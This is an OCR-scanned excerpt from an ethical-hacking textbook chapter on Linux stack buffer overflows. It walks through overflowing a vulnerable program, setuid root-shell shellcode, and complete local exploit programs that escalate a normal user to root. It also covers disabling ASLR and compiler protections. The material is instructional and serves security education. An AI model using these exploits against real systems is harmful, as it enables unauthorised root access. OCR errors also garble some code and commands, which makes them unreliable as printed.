print 'Foo not greater than or equal to 3' 

while foo < 10: 

foo = foo + bar 



Sockets with Python 

The final topic we need to cover is the Python's socket object. To demonstrate Python 
sockets, let's build a simple client that connects to a remote (or local) host and sends 
'Hello, world'. To test this code, we'll need a "server" to listen for this client to connect. 
We can simulate a server by binding a netcat listener to port 4242 with the following 
syntax (you may want to launch nc in a new window): 

% nc -1 -p 4242 

The client code follows: 



import socket 

s = socket . socket (socket ,AF_INET, socket . SOCK_STREAM) 
s . connect ((' localhost ' , 4242)) 

s . send (' Hello, world') # This returns how many bytes were sent 

data = s.recv(1024) 
s . close ( ) 

print 'Received', 'data' 



Pretty straightforward, eh? You do need to remember to import the socket library, 
and then the socket instantiation line has some socket options to remember, but the 
rest is easy. You connect to a host and port, send what you want, recv into an object, 
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and then dose the socket down. When you execute this, you should see 'Hello, world' 
show up on your netcat listener and anything you type into the listener returned back 
to the client. For extra credit, figure out how to simulate that netcat listener in Python 
with the bindQ, listenQ, and acceptQ statements. 

Congratulations! You now know enough Python to survive. 

References 

Good Python tutorial docs.python.org/tut/tut.html 
Python home page www.python.org 
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Why study exploits? Ethical hackers should study exploits to understand if a vulnerabil- 
ity is exploitable. Sometimes security professionals will mistakenly believe and publish 
the statement: "The vulnerability is not exploitable." The black hat hackers know oth- 
erwise. They know that just because one person could not find an exploit to the vulner- 
ability, that doesn't mean someone else won't find it. It is all a matter of time and skill 
level. Therefore, gray hat, ethical hackers must understand how to exploit vulnerabili- 
ties and check for themselves. In the process, they may need to produce proof of con- 
cept code to demonstrate to the vendor that the vulnerability is exploitable and needs 
to be fixed. 

In this chapter, we cover basic Linux exploit concepts: 

• Stack operations 

• Buffer overflows 

• Local buffer overflow exploits 

• Exploit development process 

Stack Operations 

The stack is one of the most interesting capabilities of an operating system. The concept 
of a stack can best be explained by comparing it to the stack of lunch trays in your 
school cafeteria. When you put a tray on the stack, the tray that was previously on top 
of the stack is covered up. When you take a tray from the stack, you take the tray from 
the top of the stack, which happens to be the last one put on. More formally, in com- 
puter science terms, the stack is a data structure that has the quality of a first in, last out 
(FILO) queue. 

The process of putting items on the stack is called a push and is done in the assem- 
bly code language with the push command. Likewise, the process of taking an item 
from the stack is called a pop and is accomplished with the pop command in assembly 
language code. 

In memory, each process maintains its own stack within the stack segment of mem- 
ory. Remember, the stack grows backward from the highest memory addresses to the 
lowest. Two important registers deal with the stack: extended base pointer (ebp) and 
extended stack pointer (esp). As Figure 11-1 indicates, the ebp register is the base of the 
current stack frame of a process (higher address). The esp register always points to the 
top of the stack (lower address). 
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< Stack Grows 



Low Mem: ESP EBP High Mem: 

Oxllllllll OxfffffffO 

Function Calling Procedure 

As explained in Chapter 10, a function is a self-contained module of code that is called 
by other functions, including the main() function. This call causes a jump in the flow 
of the program. When a function is called in assembly code, three things take place: 

• By convention, the calling program sets up the function call by first placing 
the function parameters on the stack in reverse order. 

• Next, the extended instruction pointer (eip) is saved on the stack so the 
program can continue where it left off when the function returns. This is 
referred to as the return address. 

• Finally, the call command is executed, and the address of the function is 
placed in eip to execute. 



Stack Frame 



Figure I I- 1 

The relationship 
of ebp and esp on 
a stack 




NOTE The assembly shown in this chapter is produced with the following 
gcc compile option: -fno-stack-protector (as described in Chapter 10). This 
disables stack protection, which helps you to learn about buffer overflows. A 
discussion of recent memory and compiler protections is left for Chapter 12. 



fn assembly code, the function call looks like this: 



0x8048393 


<main+3> : 


mov 


Oxc (%ebp) , %eax 


0x8048396 


<main+6> : 


add 


$0x8 , %eax 


0x8048399 


<main+9> : 


pushl 


(%eax) 


0x804839b 


<main+ll> : 


mov 


Oxc (%ebp) , %eax 


0x804839e 


<main+14> : 


add 


$0x4 , %eax 


0x80483al 


<main+17> : 


pushl 


(%eax) 


0x80483a3 


<main+l 9> : 


call 


0x804835c <greeting> 



The called function's responsibilities are first to save the calling program's ebp reg- 
ister on the stack, then to save the current esp register to the ebp register (setting the 
current stack frame), and then to decrement the esp register to make room for the func- 
tion's local variables. Finally, the function gets an opportunity to execute its statements. 
This process is called the function prolog. 

In assembly code, the prolog looks like this: 

0x804835c <greeting>: push %ebp 

0x804835d <greeting+l> : mov %esp,%ebp 

0x804835f <greeting+3> : sub $0x190, %esp 

The last thing a called function does before returning to the calling program is to 
clean up the stack by incrementing esp to ebp, effectively clearing the stack as part of 
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the leave statement. Then the saved eip is popped off the stack as part of the return 
process. This is referred to as the function epilog. If everything goes well, eip still holds 
the next instruction to be fetched and the process continues with the statement after the 
function call. 

In assembly code, the epilog looks like this: 

0x804838e <greeting+50> : leave 

0x804838f <greeting+51> : ret 

You will see these small bits of assembly code over and over when looking for buffer 
overflows. 



References 

Buffer overflow en.wikipedia.org/wiki/Buffer_overflow 

Intel x86 Function-call Conventions - Assembly View (Steve Friedl) 

www.unixwiz.net/techtips/win32-callconv-asm.html 

Buffer Overflows 

Now that you have the basics down, we can get to the good stuff. 

As described in Chapter 10, buffers are used to store data in memory. We are mostly 
interested in buffers that hold strings. Buffers themselves have no mechanism to keep 
you from putting too much data in the reserved space. In fact, if you get sloppy as a 
programmer, you can quickly outgrow the allocated space. For example, the following 
declares a string in memory of 10 bytes: 

char strl [10] ; 

So what happens if you execute the following? 

Strcpy (strl, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ) ; 

Let's find out. 



//overflow. c 
#include <string.h> 
main ( ) { 

char strl [10]; //declare a 10 byte string 

//next, copy 35 bytes of "A" to strl 

Strcpy (strl, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ) ; 



Then compile and execute the program as follows: 

$ //notice we start out at user privileges "$" 

$gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -o overflow 
overflow . c . /overflow 
09963: Segmentation fault 
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Why did you get a segmentation fault? Let's see by firing up gdb: 

$gdb -q overflow 
(gdb) run 

Starting program: /book/overflow 

Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 

(gdb) info reg eip 

eip 0x41414141 0x41414141 

(gdb) q 

A debugging session is active. 

Do you still want to close the debugger? (y or n) y 

$ 



As you can see, when you ran the program in gdb, it crashed when trying to execute 
the instruction at 0x41414141, which happens to be hex for AAAA (A in hex is 0x41). 
Next you can check whether eip was corrupted with A's: yes, eip is full of A's and the 
program was doomed to crash. Remember, when the function (in this case, main) at- 
tempts to return, the saved eip value is popped off of the stack and executed next. Since 
the address 0x41414141 is out of your process segment, you got a segmentation fault. 




CAUTION Fedora and other recent builds use address space layout 
randomization (ASLR) to randomize stack memory calls and will have mixed 
results for the rest of this chapter. If you wish to use one of these builds, 
disable ASLR as follows: 



#echo "0" > /proc/sys/kernel/randomize_va_space 

#echo "0" > /proc/sys/kernel/exec-shield 

#echo "0" > /proc/sys/kernel/exec-shield-randomize 



Now, let's look at attacking meet.c 



Overflow of meet.c 

From Chapter 10, we have meet.c: 

//meet . c#include <stdio.h> // needed for screen printing 
#include <string.h> 

greeting (char *templ,char *temp2) { // greeting function to say hello 
char name [400]; // string variable to hold the name 

strcpy(name, temp2) ; // copy the function argument to name 

printf ( "Hello %s %s\n", tempi, name); //print out the greeting 

} 

main(int argc, char * argv[]){ //note the format for arguments 

greeting (argv [1] , argv[2]); //call function, pass title & name 

printf ("Bye %s %s\n", argv[l], argv[2]); //say "bye" 

} //exit program 

To overflow the 400-byte buffer in meet.c, you will need another tool, perl. Perl is 
an interpreted language, meaning that you do not need to precompile it, making it 
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very handy to use at the command line. For now you only need to understand one perl 
command: 

'perl -e 'print "A" x 600'' 




NOTE backticks (') are used to wrap perl commands and have the shell 
interpreter execute the command and return the value. 



This command will simply print 600 A's to standard out — try it! 

Using this trick, you will start by feeding ten A's to your program (remember, it 
takes two parameters): 

# //notice, we have switched to root user "#" 

#gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o 
meet meet.c 

# . /meet Mr 'perl -e 'print "A" x 10’' 

Hello Mr AAAAAAAAAA 
Bye Mr AAAAAAAAAA 

# 



Next you will feed 600 A's to the meet.c program as the second parameter, as 
follows: 

# . /meet Mr 'perl -e 'print "A" x 600'' 

Segmentation fault 



As expected, your 400-byte buffer was overflowed; hopefully, so was eip. To verify, 
start gdb again: 

# gdb -q meet 

(gdb) run Mr 'perl -e 'print "A" x 600'' 

Starting program: /book/meet Mr 'perl -e 'print "A" x 600'' 

Program received signal SIGSEGV, Segmentation fault. 

0x4006152d in strlen () from /lib/libc . so . 6 

(gdb) info reg eip 

eip 0x400 6152d 0x4006152d 




NOTE Your values will be different — it is the concept we are trying to get 
across here, not the memory values. 



Not only did you not control eip, you have moved far away to another portion of 
memory. If you take a look at meet.c, you will notice that after the strcpyQ function in 
the greeting function, there is a printfQ call. That printf, in turn, calls vfprintf() in the 
libc library. The vfprintf() function then calls strlen. But what could have gone wrong? 
You have several nested functions and thereby several stack frames, each pushed on the 
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stack. As you overflowed, you must have corrupted the arguments passed into the func- 
tion. Recall from the previous section that the call and prolog of a function leave the 
stack looking like the following illustration: 



Function 

Variable Parameters 





ESP 


Name 


EBP 


EIP 


Tempi 


Temp2 



Low Mem: 
Oxllllllll 



4 Stack Grows 



High Mem: 
OxfffffffO 



If you write past eip, you will overwrite the function arguments, starting with tempi. 
Since the printf() function uses tempi, you will have problems. To check out this the- 
ory, let's check back with gdb: 

(gdb) 

(gdb) list 

1 //meet.c 

2 #include <stdio.h> 

3 greeting ( char* tempi, char* temp2){ 

4 char name [4 00]; 

5 strcpy (name, temp2); 

6 printf ( "Hello %s %s\n", tempi, name) ; 

7 } 

8 main(int argc, char * argv[]){ 

9 greeting (argv [1] , argv [2] ) ; 

10 printf ("Bye %s %s\n", argv[l], argv[2]); 

(gdb) b 6 

Breakpoint 1 at 0x8048377: file meet.c, line 6. 

(gdb) 

(gdb) run Mr 'perl -e 'print "A" x 600 ' ' 

Starting program: /book/meet Mr 'perl -e 'print "A" x 600'' 

Breakpoint 1, greeting (templ=0x41414141 temp2=0x41414141 "") at 

meet . c : 6 

6 printf ( "Hello %s %s\n", tempi, name); 

You can see in the preceding bolded line that the arguments to your function, tempi 
and temp2, have been corrupted. The pointers now point to 0x41414141 and the values 
are "" or null. The problem is that printf() will not take nulls as the only inputs and 
chokes. So let's start with a lower number of A's, such as 401, and then slowly increase 
until we get the effect we need: 

(gdb) d 1 Cremove breakpoint 1> 

(gdb) run Mr 'perl -e 'print "A" x 401’' 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /book/meet Mr 'perl -e 'print "A" x 401'' 

Hello Mr 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[more 'A's removed for brevity] 

AAA 



Program received signal SIGSEGV, Segmentation fault. 
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main (argc=0, argv=0x0) at meet.czlO 
10 printf("Bye %s %s\n", argv[l], argv[2]); 

(gdb) 

(gdb) info reg ebp eip 

ebp Oxbf f f 004 1 0xbfff0041 

eip 0x80483ab 0x80483ab 

(gdb) 

(gdb) run Mr 'perl -e 'print "A" x 404' ' 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /book/meet Mr 'perl -e 'print "A" x 404'' 
Hello Mr 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[more 'A's removed for brevity] 

AAA 

Program received signal SIGSEGV, Segmentation fault. 

0x08048300 in do_global_dtors_aux () 

(gdb) 

(gdb) info reg ebp eip 
ebp 0x41414141 0x41414141 

eip 0x8048300 0x8048300 

(gdb) 

(gdb) run Mr 'perl -e 'print "A" x 408'' 

The program being debugged has been started already. 

Start it from the beginning? (y or n) y 

Starting program: /book/meet Mr 'perl -e 'print "A" x 408'' 
Hello 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
[more 'A's removed for brevity] 

AAAAAAA 

Program received signal SIGSEGV, Segmentation fault. 

0x41414141 in ?? () 

(gdb) q 

A debugging session is active. 

Do you still want to close the debugger? (y or n) y 

# 



As you can see, when a segmentation fault occurs in gdb, the current value of eip is 
shown. 

It is important to realize that the numbers (400-408) are not as important as the 
concept of starting low and slowly increasing until you just overflow the saved eip and 
nothing else. This was because of the printf call immediately after the overflow. Some- 
times you will have more breathing room and will not need to worry about this as 
much. For example, if there were nothing following the vulnerable strcpy command, 
there would be no problem overflowing beyond 408 bytes in this case. 




NOTE Remember, we are using a very simple piece of flawed code here; 
in real life you will encounter problems like this and more. Again, it’s the 
concepts we want you to get, not the numbers required to overflow a 
particular vulnerable piece of code. 
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Ramifications of Buffer Overflows 

When dealing with buffer overflows, there are basically three things that can happen. 

The first is denial of service. As we saw previously, it is really easy to get a segmentation 
fault when dealing with process memory. However, it's possible that is the best thing 
that can happen to a software developer in this situation, because a crashed program 
will draw attention. The other alternatives are silent and much worse. 

The second thing that can happen when a buffer overflow occurs is that the eip can 
be controlled to execute malicious code at the user level of access. This happens when 
the vulnerable program is running at the user level of privilege. 

The third and absolutely worst thing that can happen when a buffer overflow occurs 
is that the eip can be controlled to execute malicious code at the system or root level. 

In Unix systems, there is only one superuser, called root. The root user can do anything 
on the system. Some functions on Unix systems should be protected and reserved for 
the root user. For example, it would generally be a bad idea to give users root privileges 
to change passwords, so a concept called Set User ID (SUID) was developed to tempo- 
rarily elevate a process to allow some files to be executed under their owner's privilege 
level. So, for example, the passwd command can be owned by root and when a user 
executes it, the process runs as root. The problem here is that when the SUID program 
is vulnerable, an exploit may gain the privileges of the file's owner (in the worst case, 
root). To make a program an SUID, you would issue the following command: 

chmod u+s <filename> or chmod 4755 <filename> 

The program will run with the permissions of the owner of the file. To see the full 
ramifications of this, let's apply SUID settings to our meet program. Then later, when 
we exploit the meet program, we will gain root privileges. 

#chmod u+s meet 
#ls -1 meet 

-rwsr-sr-x 1 root root 11643 May 28 12:42 meet* 

The first field of the preceding line indicates the file permissions. The first position 
of that field is used to indicate a link, directory, or file (1, d, or -). The next three posi- 
tions represent the file owner's permissions in this order: read, write, execute. Normally, 
an x is used for execute; however, when the SUID condition applies, that position turns 
to an s as shown. That means when the file is executed, it will execute with the file 
owner's permissions, in this case root (the third field in the line). The rest of the line is 
beyond the scope of this chapter and can be learned about at the following KrnlPanic 
.com reference for SUID/GUID. 

References 

"Permissions Explained" (Richard Sandlin) 

www.krnlpanic.com/tutorials/permissions.php 

"Smashing the Stack for Fun and Profit" (Aleph One, aka Alephl) 

www.phrack. com/issues. html?issue=49&id=14#article 

"Vulnerabilities in Your Code - Advanced Buffer Overflows" (CoreSecurity) 
packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf 
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Local Buffer Overflow Exploits 

Local exploits are easier to perform than remote exploits because you have access to the 
system memory space and can debug your exploit more easily. 

The basic concept of buffer overflow exploits is to overflow a vulnerable buffer and 
change eip for malicious purposes. Remember, eip points to the next instruction to be 
executed. A copy of eip is saved on the stack as part of calling a function in order to be 
able to continue with the command after the call when the function completes. If you 
can influence the saved eip value, when the function returns, the corrupted value of eip 
will be popped off the stack into the register (eip) and be executed. 

Components of the Exploit 

To build an effective exploit in a buffer overflow situation, you need to create a larger 
buffer than the program is expecting, using the following components. 

NOP Sled 

In assembly code, the NOP command (pronounced "No-op") simply means to do 
nothing but move to the next command (NO OPeration). This is used in assembly code 
by optimizing compilers by padding code blocks to align with word boundaries. Hack- 
ers have learned to use NOPs as well for padding. When placed at the front of an exploit 
buffer, it is called a NOP sled. If eip is pointed to a NOP sled, the processor will ride the 
sled right into the next component. On x86 systems, the 0x90 opcode represents NOP. 
There are actually many more, but 0x90 is the most commonly used. 

Shellcode 

Shellcode is the term reserved for machine code that will do the hacker's bidding. Orig- 
inally, the term was coined because the purpose of the malicious code was to provide a 
simple shell to the attacker. Since then, the term has evolved to encompass code that is 
used to do much more than provide a shell, such as to elevate privileges or to execute a 
single command on the remote system. The important thing to realize here is that shell- 
code is actually binary, often represented in hexadecimal form. There are tons of shell- 
code libraries online, ready to be used for all platforms. Chapter 14 will cover writing 
your own shellcode. Until that point, all you need to know is that shellcode is used in 
exploits to execute actions on the vulnerable system. We will use Alephl's shellcode 
(shown within a test program) as follows: 

// shellcode . c 

char shellcode!] = //setuid(0) & Alephl's famous shellcode, see ref. 
"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80" //setuid(0) first 

"\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf 3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 

" \x80\xe8 \xdc\xf f \xf f \xf f /bin/ sh" ; 

int main]) { //main function 

int *ret; //ret pointer for manipulating saved return, 

ret = (int *)&ret + 2; //setret to point to the saved return 

//value on the stack. 

(*ret) = (int) shellcode; //change the saved return value to the 

//address of the shellcode, so it executes. 



} 
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Let's check it out by compiling and running the test shellcode.c program: 

# //start with root level privileges 

#gcc -mpreferred-stack-boundary=2 -f no-stack-protector -z execstack -o 
shellcode shellcode.c -o shellcode shellcode.c 
#chmod u+s shellcode 

#su joeuser //switch to a normal user (any) 

$ . /shellcode 
sh-2 . 05b# 

It worked — we got a root shell prompt. 




NOTE We used compile options to disable memory and compiler 
protections in recent versions of Linux. We did this to aide in learning the 
subject at hand. See Chapter 1 2 for a discussion of those protections. 



Repeating Return Addresses 

The most important element of the exploit is the return address, which must be aligned 
perfectly and repeated until it overflows the saved eip value on the stack. Although it is 
possible to point directly to the beginning of the shellcode, it is often much easier to be 
a little sloppy and point to somewhere in the middle of the NOP sled. To do that, the 
first thing you need to know is the current esp value, which points to the top of the 
stack. The gcc compiler allows you to use assembly code inline and to compile pro- 
grams as follows: 

#include <stdio.h> 
unsigned int get_sp (void) { 

asm ("movl %esp, %eax" ) ; 

} 

int main ( ) { 

printf ("Stack pointer (ESP): Ox%x\n", get_sp()); 

} 

# gcc -o get_sp get_sp.c 

# ,/get_sp 

Stack pointer (ESP) : 0xbffffbd8 //remember that number for later 



Remember that esp value; we will use it soon as our return address, though yours will 
be different. 

At this point, it may be helpful to check whether your system has ASLR turned on. 
You can check this easily by simply executing the last program several times in a row. If 
the output changes on each execution, then your system is running some sort of stack 
randomization scheme. 

# . /get_sp 

Stack pointer (ESP) : 0xbffffbe2 

# . /get_sp 

Stack pointer (ESP) : 0xbffffba3 

# . /get_sp 

Stack pointer (ESP) : 0xbffffbc8 
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Until you learn later how to work around that, go ahead and disable ASLR as de- 
scribed in the Caution earlier in this chapter: 

# echo "0" > /proc/sys/kernel/randomize_va_space ton slackware systems 

Now you can check the stack again (it should stay the same): 

# . /get_sp 

Stack pointer (ESP) : 0xbffffbd8 

# . /get_sp 

Stack pointer (ESP): 0xbffffbd8 //remember that number for later 



Now that we have reliably found the current esp, we can estimate the top of the 
vulnerable buffer. If you still are getting random stack addresses, try another one of the 
echo lines shown previously. 

These components are assembled (like a sandwich) in the order shown here: 



1 Exploit Buffer 




NOP Sled 


Shellcode 


Repeated 

Addresses 



Vulnerable Buffer 



EBP EIP 



As can be seen in the illustration, the addresses overwrite eip and point to the NOP 
sled, which then slides to the shellcode. 



Exploiting Stack Overflows from the Command Line 

Remember, the ideal size of our attack buffer (in this case) is 408. So we will use perl to 
craft an exploit sandwich of that size from the command line. As a rule of thumb, it is 
a good idea to fill half of the attack buffer with NOPs; in this case, we will use 200 with 
the following perl command: 

perl -e 'print "90"x200'; 

A similar perl command will allow you to print your shellcode into a binary file as 
follows (notice the use of the output redirector >): 

$ perl -e 'print 

"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80\xeb\xlf \x5e\x89\x76\x08\x31\xc0\x88\x46\ 
x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\ 
xd8 \x40\xcd\x80\xe8 \xdc\xf f \xf f \xf f /bin/sh" ; ' > sc 
$ 



You can calculate the size of the shellcode with the following command: 



$ wc -c sc 
53 sc 
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Next we need to calculate our return address, which will be repeated until it over- 
writes the saved eip on the stack. Recall that our current esp is 0xbffffbd8. When attack- 
ing from the command line, it is important to remember that the command-line 
arguments will be placed on the stack before the main function is called. Since our 408- 
byte attack string will be placed on the stack as the second command-line argument, 
and we want to land somewhere in the NOP sled (the first half of the buffer), we will 
estimate a landing spot by subtracting 0x300 (decimal 264) from the current esp as 
follows: 

Oxbf f f fbd8 - 0x300 = 0xbffff8d8 

Now we can use perl to write this address in little-endian format on the command 
line: 

perl -e 'print"\xd8\xf8\xff\xbf"x38 ' ; 

The number 38 was calculated in our case with some simple modulo math: 

(408 bytes-200 bytes of NOP - 53 bytes of Shellcode) / 4 bytes of address = 38.75 

When perl commands are be wrapped in backticks ('), they may be concatenated 
to make a larger series of characters or numeric values. For example, we can craft a 
408-byte attack string and feed it to our vulnerable meet.c program as follows: 

$ ./meet mr 'perl -e 'print " \x90 "x200 ' ; ' ' cat sc' 'perl -e 'print 
"\xd8\xfb\xf f \xbf "x38 ' ; ' 

Segmentation fault 

This 405 -byte attack string is used for the second argument and creates a buffer 
overflow as follows: 

• 200 bytes of NOPs ("\x90") 

• 53 bytes of shellcode 

• 152 bytes of repeated return addresses (remember to reverse it due to little- 
endian style ofx86 processors) 

Since our attack buffer is only 405 bytes (not 408), as expected, it crashed. The 
likely reason for this lies in the fact that we have a misalignment of the repeating ad- 
dresses. Namely, they don't correctly or completely overwrite the saved return address 
on the stack. To check for this, simply increment the number of NOPs used: 

$ ./meet mr 'perl -e 'print "\x90"x201 ' ; ' ' cat sc' 'perl -e 'print 
"\xd8\xf 8\xf f \xbf "x38 ' ; ' 

Segmentation fault 

$ ./meet mr 'perl -e 'print " \x90 "x202 ' ; ' ' cat sc' 'perl -e 'print 
"\xd8\xf 8\xf f \xbf "x38 ' ; ' 

Segmentation fault 

$ ./meet mr 'perl -e 'print " \x90 "x203 ' ; ' ' cat sc' 'perl -e 'print 
"\xd8\xf 8\xf f \xbf "x38 ' ; ' 

Hello e A lAFF 
...truncated for brevity... 
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1 lU00IeUyyy/bin/ sh0uy£.0uy£,0uy£.0uy£.0uy£,0uy£,0uy£,0uy£,0uy£,0uy£.0uy < ; 0uy£ 0uy£.0uy<; 0 
y£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£,0uy£.0uy£,0uy£.0uy£.0uy£.0uy£.0uy£.0 
y£.0uy£.0uy£,0uy£.0uy£.0uy£.0uy£.0uy£.0uy£.0uy£,0uy£.0uy£,0uy£.0uy£,0uy£,0uy£. 0uy£.0uy£. 0uy£.0 
y£.0uy£.0uy£,0uy£.0uy£.0uy£.0uy < i.0uy£. 
sh-2 . 05b# 

It worked! The important thing to realize here is how the command line allowed us 
to experiment and tweak the values much more efficiently than by compiling and 
debugging code. 

Exploiting Stack Overflows with Generic Exploit Code 

The following code is a variation of many stack overflow exploits found online and in 
the references. It is generic in the sense that it will work with many exploits under many 
situations. 

/ / exploit . c 
#include <unistd.h> 

#include <stdlib.h> 

#include <string.h> 

#include <stdio.h> 

char shellcode[] = //setuid(O) & Alephl ' s famous shellcode, see ref. 
"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80" //setuid(O) first 
"\xeb\xlf \x5e\x8 9\x76\x08\x31\xc0\x88\x4 6\x07 \x89\x4 6\x0c\xb0\x0b" 

"\x89\xf 3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 

" \x80\xe8\xdc\xf f \xf f \xf f /bin/ sh"; 

//Small function to retrieve the current esp value (only works locally) 
unsigned long get_sp (void) { 

asm ("movl %esp, %eax") ; 

} 

int main (int argc, char *argv[l]) { //main function 

int i, offset = 0; //used to count/subtract later 

unsigned int esp, ret, *addr_ptr; //used to save addresses 

char ^buffer, *ptr; //two strings: buffer, ptr 

int size = 500; //default buffer size 

esp = get_sp(); //get local esp value 

if (argc > 1) size = atoi (argv [ 1 ] ) ; //if 1 argument, store to size 

if (argc > 2) offset = atoi (argv [2 ]) ; //if 2 arguments, store offset 

if (argc > 3) esp = strtoul (argv [ 3 ] , NULL, 0 ) ; //used for remote exploits 
ret = esp - offset; //calc default value of return 

//print directions for usefprintf ( stderr, "Usage : %s<buf f_size> <offset> 

<esp : Oxf f f . . . >\n" , argv[0]); //print feedback of operation 

fprintf (stderr, "ESP: 0x%x Offset : 0x%x Return : 0x%x\n" , esp, of f set, ret ) ; 
buffer = (char *) malloc (size) ; //allocate buffer on heap 

ptr = buffer; //temp pointer, set to location of buffer 

addr_ptr = (unsigned int *) ptr; //temp addr_ptr, set to location of ptr 
//Fill entire buffer with return addresses, ensures proper alignment 
for(i=0; i < size; i+=4) { // notice increment of 4 bytes for addr 

* (addr_ptr++) = ret; //use addr_ptr to write into buffer 

} 

//Fill 1st half of exploit buffer with NOPs 

for(i=0; i < size/2; i++) { //notice, we only write up to half of size 

buffer [i] = , \x90'; //place NOPs in the first half of buffer 

} 
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//Now, place shellcode 

ptr = buffer + size/2; //set the temp ptr at half of buffer size 

for(i=0; i < strlen (shellcode) ; i++) { //write 1/2 of buffer til end of sc 
* (ptr++) = shellcode [i] ; //write the shellcode into the buffer 

} 

//Terminate the string 

buffer [size-1] =0; //This is so our buffer ends with a x\0 

//Now, call the vulnerable program with buffer as 2nd argument. 

execl (" . /meet" , "meet", "Mr buffer, 0) ; //the list of args is ended w/0 

printf ("%s\n", buffer) ; //used for remote exploits 

//Free up the heap 

free (buffer) ; //play nicely 

return 0; //exit gracefully 



The program sets up a global variable called shellcode, which holds the malicious 
shell-producing machine code in hex notation. Next a function is defined that will re- 
turn the current value of the esp register on the local system. The main function takes 
up to three arguments, which optionally set the size of the overflowing buffer, the offset 
of the buffer and esp, and the manual esp value for remote exploits. User directions are 
printed to the screen, followed by the memory locations used. Next the malicious buf- 
fer is built from scratch, filled with addresses, then NOPs, then shellcode. The buffer is 
terminated with a null character. The buffer is then injected into the vulnerable local 
program and printed to the screen (useful for remote exploits). 

Let's try our new exploit on meet.c: 

# gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o 
meet meet.c# chmod u+s meet 

# useradd -m joe 

# su joe 

$ ./exploit 600 

Usage: ./exploit <buff_size> <offset> <esp : Oxf f f . . . > 

ESP : Oxbf f f fbd8 Offset: 0x0 Return : 0xbffffbd8 
Hello e A lAFF 
...truncated for brevity... 

1 1U0@ IeUyyy/bin/sh^0uys0uys0uys0uys0uys0uy,: 0uys 0uys 0uys 0uys 0uys0uys0uyi0uys 
uys0uys0uys0uys0uys0uys0uys0uys0uys0uys0uys0uy,: 0uys 0uyi0uy,: 0uyi0uys 0uyi0uys 
uy£0uy,: 0uy£ 0uy£0uy£ 0uy£0uy£ 0uy£0uy£ 0uy£0uy£0uy,: 0uy£0uy,: 0uy£0uy£0uy,: 0uy 
sh-2.05b# whoami 
root 

sh-2.05b# exit 
exit 
$ 



It worked! Notice how we compiled the program as root and set it as a SUID pro- 
gram. Next we switched privileges to a normal user and ran the exploit. We got a root 
shell, and it worked well. Notice that the program did not crash with a buffer at size 
600 as it did when we were playing with perl in the previous section. This is because we 
called the vulnerable program differently this time, from within the exploit. In general, 
this is a more tolerant way to call the vulnerable program; your results may vary. 
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Exploiting Small Buffers 

What happens when the vulnerable buffer is too small to use an exploit buffer as previ- 
ously described? Most pieces of shellcode are 21-50 bytes in size. What if the vulnerable 
buffer you find is only 10 bytes long? For example, let's look at the following vulnerable 
code with a small buffer: 

# 

# cat smallbuff.c 

//smallbuf f . c This is a sample vulnerable program with a small buffer 
int main(int argc, char * argv[]){ 

char buff [10]; //small buffer 

strcpy ( buff, argv[l]); //problem: vulnerable function call 

} 

Now compile it and set it as SUID: 

# gcc -ggdb -mpreferred-stack-boundary=2 -fno-stack-protector -z execstack -o 
smallbuf f smallbuff.c 

# chmod u+s smallbuff 

# Is -1 smallbuff 

-rwsr-xr-x 1 root root 4192 Apr 23 00:30 smallbuff 

# cp smallbuff /home/ joe 

# su - joe 
$ pwd 
/home/ joe 

$ 



Now that we have such a program, how would we exploit it? The answer lies in the 
use of environment variables. You would store your shellcode in an environment vari- 
able or somewhere else in memory, then point the return address to that environment 
variable as follows: 

$ cat exploit2.c 

//exploit2.c works locally when the vulnerable buffer is small. 

#include <stdlib.h> 

#include <string.h> 

#include <unistd.h> 

#include <stdio.h> 

#define VULN "./smallbuff" 

#define SIZE 160 

char shellcode [] = //setuid(0) & Alephl ' s famous shellcode, see ref. 
"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80" //setuid(0) first 
"\xeb\xlf \x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf 3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 

" \x80\xe8\xdc\xf f \xf f \xf f /bin/sh" ; 
int main (int argc, char **argv) { 

// injection buffer 
char p [SIZE] ; 

// put the shellcode in target's envp 
char *env[] = { shellcode, NULL }; 

// pointer to array of arrays, what to execute 
char *vuln[] = { VULN, p, NULL }; 
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int *ptr, i, addr; 

// calculate the exact location of the shellcode 
addr = Oxbffffffa - strlen (shellcode) - strlen (VULN) ; 
fprintf (stderr, "[***] using address: %#010x\n", addr) ; 

/* fill buffer with computed address */ 

ptr = (int * ) (p+2); //start 2 bytes into array for stack alignment 
for (i = 0; i < SIZE; i += 4) { 

*ptr++ = addr; 

} 

//call the program with execle, which takes the environment as input 
execle (vuln [0] , (char * ) vuln, p, NULL, env) ; 
exit (1) ; 

} 

$ gcc -o exploit2 exploit2.c 
